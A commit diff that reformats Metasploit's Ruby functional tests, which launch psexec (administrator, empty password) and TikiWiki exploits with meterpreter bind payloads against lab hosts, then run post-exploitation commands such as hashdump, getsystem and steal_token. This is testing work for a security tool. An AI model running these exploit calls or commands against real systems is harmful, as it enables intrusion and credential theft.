Run rubocop --fix-layout test
This commit is contained in:
parent
bf00619717
commit
29cc349649
|
@ -7,27 +7,85 @@ require 'fileutils'
|
||||||
require 'msf_matchers'
|
require 'msf_matchers'
|
||||||
require 'msf_test_case'
|
require 'msf_test_case'
|
||||||
|
|
||||||
|
|
||||||
module MsfTest
|
module MsfTest
|
||||||
|
include MsfTest::MsfMatchers
|
||||||
|
|
||||||
include MsfTest::MsfMatchers
|
## This spec exists to help us describe the behavior of msfconsole - TODO
|
||||||
|
|
||||||
|
describe "Msfconsole" do
|
||||||
|
###
|
||||||
|
# Setup!
|
||||||
|
###
|
||||||
|
|
||||||
## This spec exists to help us describe the behavior of msfconsole - TODO
|
before :all do
|
||||||
|
@working_directory = File.dirname(__FILE__)
|
||||||
|
|
||||||
|
## Static specs will make use of RC files here
|
||||||
|
@static_resource_directory = "#{@working_directory}/msftest/resource"
|
||||||
|
|
||||||
|
## Directories for the generated specs
|
||||||
|
@temp_directory = "#{@working_directory}/msfconsole_specs"
|
||||||
|
@temp_input_directory = "#{@temp_directory}/generated_rc"
|
||||||
|
|
||||||
|
## Where all output from the runs will go
|
||||||
|
@temp_output_directory = "#{@temp_directory}/output"
|
||||||
|
|
||||||
|
## Create a framework object
|
||||||
|
@framework = ::Msf::Simple::Framework.create
|
||||||
|
end
|
||||||
|
|
||||||
|
before :each do
|
||||||
|
end
|
||||||
|
|
||||||
|
after :each do
|
||||||
|
end
|
||||||
|
|
||||||
|
after :all do
|
||||||
|
## Clean up
|
||||||
|
# FileUtils.rm_rf(@temp_directory)
|
||||||
|
end
|
||||||
|
|
||||||
|
###
|
||||||
|
# Static Test cases!
|
||||||
|
###
|
||||||
|
|
||||||
|
it "should start and let us run help" do
|
||||||
|
data = start_console_and_run_rc("help", "#{@static_resource_directory}/help.rc")
|
||||||
|
|
||||||
|
success_strings = [
|
||||||
|
'help',
|
||||||
|
'Database Backend Commands',
|
||||||
|
'Core Commands'
|
||||||
|
]
|
||||||
|
failure_strings = [] | generic_failure_strings
|
||||||
|
failure_exception_strings = [] | generic_failure_exception_strings
|
||||||
|
|
||||||
|
data.should contain_all_successes(success_strings)
|
||||||
|
data.should contain_no_failures_except(failure_strings, failure_exception_strings)
|
||||||
|
end
|
||||||
|
|
||||||
|
it "should generate a meterpreter session against a vulnerable win32 host" do
|
||||||
|
## Set input & output to something sane
|
||||||
|
input = Rex::Ui::Text::Input::Stdio.new
|
||||||
|
output = Rex::Ui::Text::Output::File.new("temp.output")
|
||||||
|
session = generate_x86_meterpreter_session(input, output)
|
||||||
|
|
||||||
|
session.should_not be_nil
|
||||||
|
|
||||||
|
if session
|
||||||
|
session.load_stdapi
|
||||||
|
session.run_cmd("help")
|
||||||
|
else
|
||||||
|
flunk "Error interacting with session"
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
###
|
||||||
|
# Dynamic Test Cases!!
|
||||||
|
###
|
||||||
|
|
||||||
describe "Msfconsole" do
|
|
||||||
|
|
||||||
###
|
|
||||||
# Setup!
|
|
||||||
###
|
|
||||||
|
|
||||||
before :all do
|
|
||||||
|
|
||||||
@working_directory = File.dirname(__FILE__)
|
@working_directory = File.dirname(__FILE__)
|
||||||
|
|
||||||
## Static specs will make use of RC files here
|
|
||||||
@static_resource_directory = "#{@working_directory}/msftest/resource"
|
|
||||||
|
|
||||||
## Directories for the generated specs
|
## Directories for the generated specs
|
||||||
@temp_directory = "#{@working_directory}/msfconsole_specs"
|
@temp_directory = "#{@working_directory}/msfconsole_specs"
|
||||||
@temp_input_directory = "#{@temp_directory}/generated_rc"
|
@temp_input_directory = "#{@temp_directory}/generated_rc"
|
||||||
|
@ -35,176 +93,112 @@ describe "Msfconsole" do
|
||||||
## Where all output from the runs will go
|
## Where all output from the runs will go
|
||||||
@temp_output_directory = "#{@temp_directory}/output"
|
@temp_output_directory = "#{@temp_directory}/output"
|
||||||
|
|
||||||
## Create a framework object
|
if File.directory? @temp_directory
|
||||||
@framework = ::Msf::Simple::Framework.create
|
FileUtils.rm_rf(@temp_directory)
|
||||||
end
|
|
||||||
|
|
||||||
before :each do
|
|
||||||
end
|
|
||||||
|
|
||||||
after :each do
|
|
||||||
|
|
||||||
end
|
|
||||||
|
|
||||||
after :all do
|
|
||||||
## Clean up
|
|
||||||
#FileUtils.rm_rf(@temp_directory)
|
|
||||||
end
|
|
||||||
|
|
||||||
###
|
|
||||||
# Static Test cases!
|
|
||||||
###
|
|
||||||
|
|
||||||
it "should start and let us run help" do
|
|
||||||
data = start_console_and_run_rc("help","#{@static_resource_directory}/help.rc")
|
|
||||||
|
|
||||||
success_strings = [ 'help',
|
|
||||||
'Database Backend Commands',
|
|
||||||
'Core Commands' ]
|
|
||||||
failure_strings = [] | generic_failure_strings
|
|
||||||
failure_exception_strings = [] | generic_failure_exception_strings
|
|
||||||
|
|
||||||
data.should contain_all_successes(success_strings)
|
|
||||||
data.should contain_no_failures_except(failure_strings, failure_exception_strings)
|
|
||||||
end
|
|
||||||
|
|
||||||
it "should generate a meterpreter session against a vulnerable win32 host" do
|
|
||||||
## Set input & output to something sane
|
|
||||||
input = Rex::Ui::Text::Input::Stdio.new
|
|
||||||
output = Rex::Ui::Text::Output::File.new("temp.output")
|
|
||||||
session = generate_x86_meterpreter_session(input, output)
|
|
||||||
|
|
||||||
session.should_not be_nil
|
|
||||||
|
|
||||||
if session
|
|
||||||
session.load_stdapi
|
|
||||||
session.run_cmd("help")
|
|
||||||
else
|
|
||||||
flunk "Error interacting with session"
|
|
||||||
end
|
end
|
||||||
end
|
|
||||||
|
|
||||||
###
|
|
||||||
# Dynamic Test Cases!!
|
|
||||||
###
|
|
||||||
|
|
||||||
@working_directory = File.dirname(__FILE__)
|
Dir.mkdir(@temp_directory)
|
||||||
|
Dir.mkdir(@temp_input_directory)
|
||||||
|
Dir.mkdir(@temp_output_directory)
|
||||||
|
|
||||||
## Directories for the generated specs
|
Dir.glob("#{@working_directory}/msftest/*.msftest").each do |filename|
|
||||||
@temp_directory = "#{@working_directory}/msfconsole_specs"
|
## Parse this test case
|
||||||
@temp_input_directory = "#{@temp_directory}/generated_rc"
|
test_case = MsfTestCase.new(filename)
|
||||||
|
puts "Found #{test_case.name} in: #{filename}"
|
||||||
|
|
||||||
## Where all output from the runs will go
|
## Write the commands back to a temporary RC file
|
||||||
@temp_output_directory = "#{@temp_directory}/output"
|
puts "Writing #{@temp_input_directory}/#{test_case.name}.rc"
|
||||||
|
File.open("#{@temp_input_directory}/#{test_case.name}.rc", 'w') { |f| f.puts test_case.commands }
|
||||||
|
|
||||||
if File.directory? @temp_directory
|
## Create the rspec Test Case
|
||||||
FileUtils.rm_rf(@temp_directory)
|
it "should #{test_case.name}" do
|
||||||
end
|
## Gather the success / failure strings, and combine with the generics
|
||||||
|
success_strings = test_case.expected_successes
|
||||||
|
failure_strings = test_case.expected_failures | generic_failure_strings
|
||||||
|
failure_exception_strings = test_case.expected_failure_exceptions | generic_failure_exception_strings
|
||||||
|
|
||||||
Dir.mkdir(@temp_directory)
|
## run the commands
|
||||||
Dir.mkdir(@temp_input_directory)
|
data = start_console_and_run_rc(test_case.name, "#{@temp_input_directory}/#{test_case.name}.rc")
|
||||||
Dir.mkdir(@temp_output_directory)
|
|
||||||
|
|
||||||
Dir.glob("#{@working_directory}/msftest/*.msftest").each do |filename|
|
|
||||||
|
|
||||||
## Parse this test case
|
|
||||||
test_case = MsfTestCase.new(filename)
|
|
||||||
puts "Found #{test_case.name} in: #{filename}"
|
|
||||||
|
|
||||||
## Write the commands back to a temporary RC file
|
## check the output
|
||||||
puts "Writing #{@temp_input_directory}/#{test_case.name}.rc"
|
data.should contain_all_successes(success_strings)
|
||||||
File.open("#{@temp_input_directory}/#{test_case.name}.rc", 'w') { |f| f.puts test_case.commands }
|
data.should contain_no_failures_except(failure_strings, failure_exception_strings)
|
||||||
|
|
||||||
## Create the rspec Test Case
|
## Clean up
|
||||||
it "should #{test_case.name}" do
|
# File.delete("#{@temp_input_directory}/#{test_case.name}.rc")
|
||||||
|
# File.delete("#{@temp_output_directory}/#{test_case.name}")
|
||||||
## Gather the success / failure strings, and combine with the generics
|
end
|
||||||
success_strings = test_case.expected_successes
|
|
||||||
failure_strings = test_case.expected_failures | generic_failure_strings
|
|
||||||
failure_exception_strings = test_case.expected_failure_exceptions | generic_failure_exception_strings
|
|
||||||
|
|
||||||
## run the commands
|
|
||||||
data = start_console_and_run_rc( test_case.name, "#{@temp_input_directory}/#{test_case.name}.rc")
|
|
||||||
|
|
||||||
## check the output
|
|
||||||
data.should contain_all_successes(success_strings)
|
|
||||||
data.should contain_no_failures_except(failure_strings, failure_exception_strings)
|
|
||||||
|
|
||||||
## Clean up
|
|
||||||
#File.delete("#{@temp_input_directory}/#{test_case.name}.rc")
|
|
||||||
#File.delete("#{@temp_output_directory}/#{test_case.name}")
|
|
||||||
end
|
end
|
||||||
end
|
|
||||||
|
|
||||||
###
|
###
|
||||||
# Test case helpers:
|
# Test case helpers:
|
||||||
###
|
###
|
||||||
def generic_success_strings
|
def generic_success_strings
|
||||||
[]
|
[]
|
||||||
end
|
|
||||||
|
|
||||||
def generic_failure_strings
|
|
||||||
['fatal', 'fail', 'error', 'exception']
|
|
||||||
end
|
|
||||||
|
|
||||||
def generic_failure_exception_strings
|
|
||||||
[]
|
|
||||||
end
|
|
||||||
|
|
||||||
def start_console_and_run_rc(name,rc_file, database_file=false)
|
|
||||||
output_file = "#{@temp_output_directory}/#{name}"
|
|
||||||
|
|
||||||
if database_file
|
|
||||||
msfconsole_string = "ruby #{@working_directory}/../../../msfconsole -o #{output_file} -r #{rc_file} -y #{database_file}"
|
|
||||||
else
|
|
||||||
msfconsole_string = "ruby #{@working_directory}/../../../msfconsole -o #{output_file} -r #{rc_file}"
|
|
||||||
end
|
end
|
||||||
|
|
||||||
system("#{msfconsole_string}")
|
|
||||||
|
|
||||||
data = hlp_file_to_string("#{output_file}")
|
def generic_failure_strings
|
||||||
end
|
['fatal', 'fail', 'error', 'exception']
|
||||||
|
|
||||||
def generate_x86_meterpreter_session(input, output)
|
|
||||||
## Setup for win32
|
|
||||||
exploit_name = 'windows/smb/psexec'
|
|
||||||
payload_name = 'windows/meterpreter/bind_tcp'
|
|
||||||
|
|
||||||
## Fire it off against a known-vulnerable host
|
|
||||||
session = @framework.exploits.create(exploit_name).exploit_simple(
|
|
||||||
'Options' => {'RHOST' => "vulnerable", "SMBUser" => "administrator", "SMBPass" => ""},
|
|
||||||
'Payload' => payload_name,
|
|
||||||
'LocalInput' => input,
|
|
||||||
'LocalOutput' => output)
|
|
||||||
|
|
||||||
## If a session came back, try to interact with it.
|
|
||||||
if session
|
|
||||||
return session
|
|
||||||
else
|
|
||||||
return nil
|
|
||||||
end
|
end
|
||||||
end
|
|
||||||
|
|
||||||
def generate_win64_meterpreter_session(input, output)
|
def generic_failure_exception_strings
|
||||||
raise "Not Implemented"
|
[]
|
||||||
end
|
end
|
||||||
|
|
||||||
|
def start_console_and_run_rc(name, rc_file, database_file = false)
|
||||||
def generate_java_meterpreter_session(input, output)
|
output_file = "#{@temp_output_directory}/#{name}"
|
||||||
raise "Not Implemented"
|
|
||||||
end
|
if database_file
|
||||||
|
msfconsole_string = "ruby #{@working_directory}/../../../msfconsole -o #{output_file} -r #{rc_file} -y #{database_file}"
|
||||||
def generate_php_meterpreter_session(input, output)
|
else
|
||||||
raise "Not Implemented"
|
msfconsole_string = "ruby #{@working_directory}/../../../msfconsole -o #{output_file} -r #{rc_file}"
|
||||||
end
|
end
|
||||||
|
|
||||||
def hlp_file_to_string(filename)
|
system("#{msfconsole_string}")
|
||||||
data = ""
|
|
||||||
f = File.open(filename, "r")
|
data = hlp_file_to_string("#{output_file}")
|
||||||
f.each_line do |line|
|
end
|
||||||
data += line
|
|
||||||
|
def generate_x86_meterpreter_session(input, output)
|
||||||
|
## Setup for win32
|
||||||
|
exploit_name = 'windows/smb/psexec'
|
||||||
|
payload_name = 'windows/meterpreter/bind_tcp'
|
||||||
|
|
||||||
|
## Fire it off against a known-vulnerable host
|
||||||
|
session = @framework.exploits.create(exploit_name).exploit_simple(
|
||||||
|
'Options' => { 'RHOST' => "vulnerable", "SMBUser" => "administrator", "SMBPass" => "" },
|
||||||
|
'Payload' => payload_name,
|
||||||
|
'LocalInput' => input,
|
||||||
|
'LocalOutput' => output
|
||||||
|
)
|
||||||
|
|
||||||
|
## If a session came back, try to interact with it.
|
||||||
|
if session
|
||||||
|
return session
|
||||||
|
else
|
||||||
|
return nil
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
def generate_win64_meterpreter_session(input, output)
|
||||||
|
raise "Not Implemented"
|
||||||
|
end
|
||||||
|
|
||||||
|
def generate_java_meterpreter_session(input, output)
|
||||||
|
raise "Not Implemented"
|
||||||
|
end
|
||||||
|
|
||||||
|
def generate_php_meterpreter_session(input, output)
|
||||||
|
raise "Not Implemented"
|
||||||
|
end
|
||||||
|
|
||||||
|
def hlp_file_to_string(filename)
|
||||||
|
data = ""
|
||||||
|
f = File.open(filename, "r")
|
||||||
|
f.each_line do |line|
|
||||||
|
data += line
|
||||||
|
end
|
||||||
|
return data
|
||||||
end
|
end
|
||||||
return data
|
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
end
|
|
||||||
|
|
|
@ -1,19 +1,15 @@
|
||||||
module MsfTest
|
module MsfTest
|
||||||
module JavaMeterpreterSpecs
|
module JavaMeterpreterSpecs
|
||||||
|
## This file is intended to be used in conjunction with a harness,
|
||||||
|
## such as meterpreter_win32_spec.rb
|
||||||
|
|
||||||
## This file is intended to be used in conjunction with a harness,
|
def self.included(base)
|
||||||
## such as meterpreter_win32_spec.rb
|
base.class_eval do
|
||||||
|
it "should not error when taking a screenshot" do
|
||||||
def self.included(base)
|
success_strings = [ 'Screenshot saved to' ]
|
||||||
base.class_eval do
|
hlp_run_command_check_output("screenshot", "screenshot", success_strings)
|
||||||
|
end
|
||||||
it "should not error when taking a screenshot" do
|
|
||||||
success_strings = [ 'Screenshot saved to' ]
|
|
||||||
hlp_run_command_check_output("screenshot","screenshot", success_strings)
|
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
|
||||||
end
|
end
|
||||||
|
|
|
@ -7,85 +7,80 @@ require 'meterpreter_spec_helper'
|
||||||
require 'meterpreter_specs'
|
require 'meterpreter_specs'
|
||||||
|
|
||||||
module MsfTest
|
module MsfTest
|
||||||
|
describe "JavaMeterpreter" do
|
||||||
|
# This include brings in all the spec helper methods
|
||||||
|
include MsfTest::MeterpreterSpecHelper
|
||||||
|
|
||||||
describe "JavaMeterpreter" do
|
# This include brings in all the specs that are generic across the
|
||||||
|
# meterpreter platforms
|
||||||
# This include brings in all the spec helper methods
|
include MsfTest::MeterpreterSpecs
|
||||||
include MsfTest::MeterpreterSpecHelper
|
|
||||||
|
|
||||||
# This include brings in all the specs that are generic across the
|
|
||||||
# meterpreter platforms
|
|
||||||
include MsfTest::MeterpreterSpecs
|
|
||||||
|
|
||||||
# This include brings in all the specs that are specific to the java
|
|
||||||
# meterpreter
|
|
||||||
include MsfTest::JavaMeterpreterSpecs
|
|
||||||
|
|
||||||
before :all do
|
# This include brings in all the specs that are specific to the java
|
||||||
@verbose = true
|
# meterpreter
|
||||||
|
include MsfTest::JavaMeterpreterSpecs
|
||||||
@meterpreter_type = "java"
|
|
||||||
|
|
||||||
## Set up an outupt directory
|
|
||||||
@output_directory = File.join(File.dirname(__FILE__), "test_output_#{@meterpreter_type}")
|
|
||||||
|
|
||||||
if File.directory? @output_directory
|
before :all do
|
||||||
|
@verbose = true
|
||||||
|
|
||||||
|
@meterpreter_type = "java"
|
||||||
|
|
||||||
|
## Set up an outupt directory
|
||||||
|
@output_directory = File.join(File.dirname(__FILE__), "test_output_#{@meterpreter_type}")
|
||||||
|
|
||||||
|
if File.directory? @output_directory
|
||||||
|
FileUtils.rm_rf(@output_directory)
|
||||||
|
end
|
||||||
|
|
||||||
|
Dir.mkdir(@output_directory)
|
||||||
|
@default_file = "#{@output_directory}/default"
|
||||||
|
|
||||||
|
create_session_java
|
||||||
|
end
|
||||||
|
|
||||||
|
before :each do
|
||||||
|
end
|
||||||
|
|
||||||
|
after :each do
|
||||||
|
@session.init_ui(@input, @output)
|
||||||
|
end
|
||||||
|
|
||||||
|
after :all do
|
||||||
|
# FileUtils.rm_rf("*.jpeg")
|
||||||
|
# FileUtils.rm_rf("payload.jar")
|
||||||
FileUtils.rm_rf(@output_directory)
|
FileUtils.rm_rf(@output_directory)
|
||||||
end
|
end
|
||||||
|
|
||||||
Dir.mkdir(@output_directory)
|
def create_session_java
|
||||||
@default_file = "#{@output_directory}/default"
|
## Setup for win32
|
||||||
|
@framework = Msf::Simple::Framework.create
|
||||||
|
|
||||||
create_session_java
|
test_modules_path = File.join(File.dirname(__FILE__), '..', '..', 'modules')
|
||||||
end
|
@framework.modules.add_module_path(test_modules_path)
|
||||||
|
|
||||||
before :each do
|
@exploit_name = 'test/java_tester'
|
||||||
|
@payload_name = 'java/meterpreter/bind_tcp'
|
||||||
|
@input = Rex::Ui::Text::Input::Stdio.new
|
||||||
|
@output = Rex::Ui::Text::Output::File.new(@default_file)
|
||||||
|
|
||||||
end
|
# Initialize the exploit instance
|
||||||
|
exploit = @framework.exploits.create(@exploit_name)
|
||||||
|
|
||||||
after :each do
|
## Fire it off against a known-vulnerable host
|
||||||
@session.init_ui(@input, @output)
|
@session = exploit.exploit_simple(
|
||||||
end
|
'Options' => {},
|
||||||
|
'Payload' => @payload_name,
|
||||||
after :all do
|
'LocalInput' => @input,
|
||||||
#FileUtils.rm_rf("*.jpeg")
|
'LocalOutput' => @output
|
||||||
#FileUtils.rm_rf("payload.jar")
|
)
|
||||||
FileUtils.rm_rf(@output_directory)
|
|
||||||
end
|
|
||||||
|
|
||||||
|
puts @session.inspect
|
||||||
def create_session_java
|
|
||||||
|
|
||||||
## Setup for win32
|
## If a session came back, try to interact with it.
|
||||||
@framework = Msf::Simple::Framework.create
|
if @session
|
||||||
|
@session.load_stdapi
|
||||||
test_modules_path = File.join(File.dirname(__FILE__), '..', '..', 'modules')
|
else
|
||||||
@framework.modules.add_module_path(test_modules_path)
|
raise Exception "Couldn't get a session!"
|
||||||
|
end
|
||||||
@exploit_name = 'test/java_tester'
|
|
||||||
@payload_name = 'java/meterpreter/bind_tcp'
|
|
||||||
@input = Rex::Ui::Text::Input::Stdio.new
|
|
||||||
@output = Rex::Ui::Text::Output::File.new(@default_file)
|
|
||||||
|
|
||||||
# Initialize the exploit instance
|
|
||||||
exploit = @framework.exploits.create(@exploit_name)
|
|
||||||
|
|
||||||
## Fire it off against a known-vulnerable host
|
|
||||||
@session = exploit.exploit_simple(
|
|
||||||
'Options' => {},
|
|
||||||
'Payload' => @payload_name,
|
|
||||||
'LocalInput' => @input,
|
|
||||||
'LocalOutput' => @output)
|
|
||||||
|
|
||||||
puts @session.inspect
|
|
||||||
|
|
||||||
## If a session came back, try to interact with it.
|
|
||||||
if @session
|
|
||||||
@session.load_stdapi
|
|
||||||
else
|
|
||||||
raise Exception "Couldn't get a session!"
|
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
|
||||||
end
|
end
|
||||||
|
|
|
@ -7,76 +7,71 @@ require 'meterpreter_spec_helper'
|
||||||
require 'meterpreter_specs'
|
require 'meterpreter_specs'
|
||||||
|
|
||||||
module MsfTest
|
module MsfTest
|
||||||
|
describe "PhpMeterpreter" do
|
||||||
|
# This include brings in all the spec helper methods
|
||||||
|
include MsfTest::MeterpreterSpecHelper
|
||||||
|
|
||||||
describe "PhpMeterpreter" do
|
# This include brings in all the specs that are generic across the
|
||||||
|
# meterpreter platforms
|
||||||
# This include brings in all the spec helper methods
|
include MsfTest::MeterpreterSpecs
|
||||||
include MsfTest::MeterpreterSpecHelper
|
|
||||||
|
|
||||||
# This include brings in all the specs that are generic across the
|
|
||||||
# meterpreter platforms
|
|
||||||
include MsfTest::MeterpreterSpecs
|
|
||||||
|
|
||||||
before :all do
|
before :all do
|
||||||
@verbose = true
|
@verbose = true
|
||||||
|
|
||||||
@meterpreter_type = "php"
|
|
||||||
|
|
||||||
## Set up an outupt directory
|
|
||||||
@output_directory = File.join(File.dirname(__FILE__), "test_output_#{@meterpreter_type}")
|
|
||||||
|
|
||||||
if File.directory? @output_directory
|
@meterpreter_type = "php"
|
||||||
|
|
||||||
|
## Set up an outupt directory
|
||||||
|
@output_directory = File.join(File.dirname(__FILE__), "test_output_#{@meterpreter_type}")
|
||||||
|
|
||||||
|
if File.directory? @output_directory
|
||||||
|
FileUtils.rm_rf(@output_directory)
|
||||||
|
end
|
||||||
|
|
||||||
|
Dir.mkdir(@output_directory)
|
||||||
|
@default_file = "#{@output_directory}/default"
|
||||||
|
|
||||||
|
create_session_php
|
||||||
|
end
|
||||||
|
|
||||||
|
before :each do
|
||||||
|
end
|
||||||
|
|
||||||
|
after :each do
|
||||||
|
@session.init_ui(@input, @output)
|
||||||
|
end
|
||||||
|
|
||||||
|
after :all do
|
||||||
FileUtils.rm_rf(@output_directory)
|
FileUtils.rm_rf(@output_directory)
|
||||||
end
|
end
|
||||||
|
|
||||||
Dir.mkdir(@output_directory)
|
def create_session_php
|
||||||
@default_file = "#{@output_directory}/default"
|
## Setup for php
|
||||||
|
@framework = Msf::Simple::Framework.create
|
||||||
|
|
||||||
create_session_php
|
@exploit_name = 'unix/webapp/tikiwiki_graph_formula_exec'
|
||||||
end
|
@payload_name = 'php/meterpreter/bind_tcp'
|
||||||
|
@input = Rex::Ui::Text::Input::Stdio.new
|
||||||
|
@output = Rex::Ui::Text::Output::File.new(@default_file)
|
||||||
|
|
||||||
before :each do
|
# Initialize the exploit instance
|
||||||
|
exploit = @framework.exploits.create(@exploit_name)
|
||||||
|
|
||||||
end
|
## Fire it off against a known-vulnerable host
|
||||||
|
@session = exploit.exploit_simple(
|
||||||
|
'Options' => { 'RHOST' => "metasploitable" },
|
||||||
|
'Payload' => @payload_name,
|
||||||
|
'LocalInput' => @input,
|
||||||
|
'LocalOutput' => @output
|
||||||
|
)
|
||||||
|
|
||||||
after :each do
|
puts @session.inspect
|
||||||
@session.init_ui(@input, @output)
|
|
||||||
end
|
|
||||||
|
|
||||||
after :all do
|
|
||||||
FileUtils.rm_rf(@output_directory)
|
|
||||||
end
|
|
||||||
|
|
||||||
|
## If a session came back, try to interact with it.
|
||||||
def create_session_php
|
if @session
|
||||||
|
@session.load_stdapi
|
||||||
## Setup for php
|
else
|
||||||
@framework = Msf::Simple::Framework.create
|
raise Exception "Couldn't get a session!"
|
||||||
|
end
|
||||||
@exploit_name = 'unix/webapp/tikiwiki_graph_formula_exec'
|
|
||||||
@payload_name = 'php/meterpreter/bind_tcp'
|
|
||||||
@input = Rex::Ui::Text::Input::Stdio.new
|
|
||||||
@output = Rex::Ui::Text::Output::File.new(@default_file)
|
|
||||||
|
|
||||||
# Initialize the exploit instance
|
|
||||||
exploit = @framework.exploits.create(@exploit_name)
|
|
||||||
|
|
||||||
## Fire it off against a known-vulnerable host
|
|
||||||
@session = exploit.exploit_simple(
|
|
||||||
'Options' => {'RHOST' => "metasploitable"},
|
|
||||||
'Payload' => @payload_name,
|
|
||||||
'LocalInput' => @input,
|
|
||||||
'LocalOutput' => @output)
|
|
||||||
|
|
||||||
puts @session.inspect
|
|
||||||
|
|
||||||
## If a session came back, try to interact with it.
|
|
||||||
if @session
|
|
||||||
@session.load_stdapi
|
|
||||||
else
|
|
||||||
raise Exception "Couldn't get a session!"
|
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
|
||||||
end
|
end
|
||||||
|
|
|
@ -1,58 +1,55 @@
|
||||||
module MsfTest
|
module MsfTest
|
||||||
module MeterpreterSpecHelper
|
module MeterpreterSpecHelper
|
||||||
|
def self.included(base)
|
||||||
def self.included(base)
|
base.class_eval do
|
||||||
base.class_eval do
|
def generic_failure_strings
|
||||||
|
['fail', 'error', 'exception']
|
||||||
def generic_failure_strings
|
|
||||||
['fail', 'error', 'exception']
|
|
||||||
end
|
|
||||||
|
|
||||||
def generic_failure_exception_strings
|
|
||||||
['nserror.dll', 'tiki-error.php','tiki-error_simple.php','tiki-rss_error.php'] ##ugh, this is dependent on the target
|
|
||||||
end
|
|
||||||
|
|
||||||
def hlp_run_command_check_output(name,command,success_strings=[],fail_strings=[], fail_exception_strings=[])
|
|
||||||
|
|
||||||
fail_strings = fail_strings | generic_failure_strings
|
|
||||||
fail_exception_strings = fail_exception_strings | generic_failure_exception_strings
|
|
||||||
|
|
||||||
temp_command_file = "#{@output_directory}/#{name}"
|
|
||||||
|
|
||||||
command_output = Rex::Ui::Text::Output::File.new(temp_command_file)
|
|
||||||
@session.init_ui(@input, command_output)
|
|
||||||
|
|
||||||
command_output.print_line("meterpreter_functional_test_start")
|
|
||||||
|
|
||||||
if @verbose
|
|
||||||
puts "Running Command: " + command
|
|
||||||
end
|
end
|
||||||
|
|
||||||
@session.run_cmd(command)
|
def generic_failure_exception_strings
|
||||||
command_output.print_line("meterpreter_functional_test_end")
|
['nserror.dll', 'tiki-error.php', 'tiki-error_simple.php', 'tiki-rss_error.php'] # #ugh, this is dependent on the target
|
||||||
data = hlp_file_to_string(temp_command_file)
|
|
||||||
|
|
||||||
data.should contain_a_complete_test
|
|
||||||
data.should contain_all_successes
|
|
||||||
data.should contain_no_failures_except
|
|
||||||
end
|
|
||||||
|
|
||||||
def hlp_file_to_string(filename)
|
|
||||||
data = ""
|
|
||||||
f = File.open(filename, "r")
|
|
||||||
f.each_line do |line|
|
|
||||||
data += line
|
|
||||||
end
|
end
|
||||||
return data
|
|
||||||
end
|
def hlp_run_command_check_output(name, command, success_strings = [], fail_strings = [], fail_exception_strings = [])
|
||||||
|
fail_strings = fail_strings | generic_failure_strings
|
||||||
def hlp_string_to_file(string, filepath)
|
fail_exception_strings = fail_exception_strings | generic_failure_exception_strings
|
||||||
# Create a new file and write to it
|
|
||||||
File.open(filepath, 'w') do |f2|
|
temp_command_file = "#{@output_directory}/#{name}"
|
||||||
|
|
||||||
|
command_output = Rex::Ui::Text::Output::File.new(temp_command_file)
|
||||||
|
@session.init_ui(@input, command_output)
|
||||||
|
|
||||||
|
command_output.print_line("meterpreter_functional_test_start")
|
||||||
|
|
||||||
|
if @verbose
|
||||||
|
puts "Running Command: " + command
|
||||||
|
end
|
||||||
|
|
||||||
|
@session.run_cmd(command)
|
||||||
|
command_output.print_line("meterpreter_functional_test_end")
|
||||||
|
data = hlp_file_to_string(temp_command_file)
|
||||||
|
|
||||||
|
data.should contain_a_complete_test
|
||||||
|
data.should contain_all_successes
|
||||||
|
data.should contain_no_failures_except
|
||||||
|
end
|
||||||
|
|
||||||
|
def hlp_file_to_string(filename)
|
||||||
|
data = ""
|
||||||
|
f = File.open(filename, "r")
|
||||||
|
f.each_line do |line|
|
||||||
|
data += line
|
||||||
|
end
|
||||||
|
return data
|
||||||
|
end
|
||||||
|
|
||||||
|
def hlp_string_to_file(string, filepath)
|
||||||
|
# Create a new file and write to it
|
||||||
|
File.open(filepath, 'w') do |f2|
|
||||||
f2.puts string
|
f2.puts string
|
||||||
end
|
end
|
||||||
|
end
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
end
|
|
||||||
|
|
|
@ -1,11 +1,10 @@
|
||||||
module MsfTest
|
module MsfTest
|
||||||
module MeterpreterSpecs
|
module MeterpreterSpecs
|
||||||
|
def self.included(base)
|
||||||
def self.included(base)
|
base.class_eval do
|
||||||
base.class_eval do
|
it "should not error when running each command" do
|
||||||
|
commands = [
|
||||||
it "should not error when running each command" do
|
"?",
|
||||||
commands = [ "?",
|
|
||||||
"background",
|
"background",
|
||||||
"bgkill",
|
"bgkill",
|
||||||
"bglist",
|
"bglist",
|
||||||
|
@ -15,9 +14,9 @@ module MeterpreterSpecs
|
||||||
"exit",
|
"exit",
|
||||||
"help",
|
"help",
|
||||||
"interact",
|
"interact",
|
||||||
#"irb",
|
# "irb",
|
||||||
"migrate",
|
"migrate",
|
||||||
#"quit",
|
# "quit",
|
||||||
"read",
|
"read",
|
||||||
"run",
|
"run",
|
||||||
"use",
|
"use",
|
||||||
|
@ -27,7 +26,7 @@ module MeterpreterSpecs
|
||||||
"cd",
|
"cd",
|
||||||
"del",
|
"del",
|
||||||
"download",
|
"download",
|
||||||
#"edit",
|
# "edit",
|
||||||
"getlwd",
|
"getlwd",
|
||||||
"getwd",
|
"getwd",
|
||||||
"lcd",
|
"lcd",
|
||||||
|
@ -50,11 +49,11 @@ module MeterpreterSpecs
|
||||||
"getuid",
|
"getuid",
|
||||||
"kill",
|
"kill",
|
||||||
"ps",
|
"ps",
|
||||||
#"reboot",
|
# "reboot",
|
||||||
"reg",
|
"reg",
|
||||||
"rev2self",
|
"rev2self",
|
||||||
#"shell",
|
# "shell",
|
||||||
#"shutdown",
|
# "shutdown",
|
||||||
"steal_token",
|
"steal_token",
|
||||||
"sysinfo",
|
"sysinfo",
|
||||||
"enumdesktops",
|
"enumdesktops",
|
||||||
|
@ -69,41 +68,43 @@ module MeterpreterSpecs
|
||||||
"getsystem",
|
"getsystem",
|
||||||
"hashdump",
|
"hashdump",
|
||||||
"timestomp"
|
"timestomp"
|
||||||
]
|
]
|
||||||
|
|
||||||
## Run each command, check for execeptions
|
## Run each command, check for execeptions
|
||||||
commands.each do |command|
|
commands.each do |command|
|
||||||
hlp_run_command_check_output("basic_#{command}",command)
|
hlp_run_command_check_output("basic_#{command}", command)
|
||||||
|
end
|
||||||
end
|
end
|
||||||
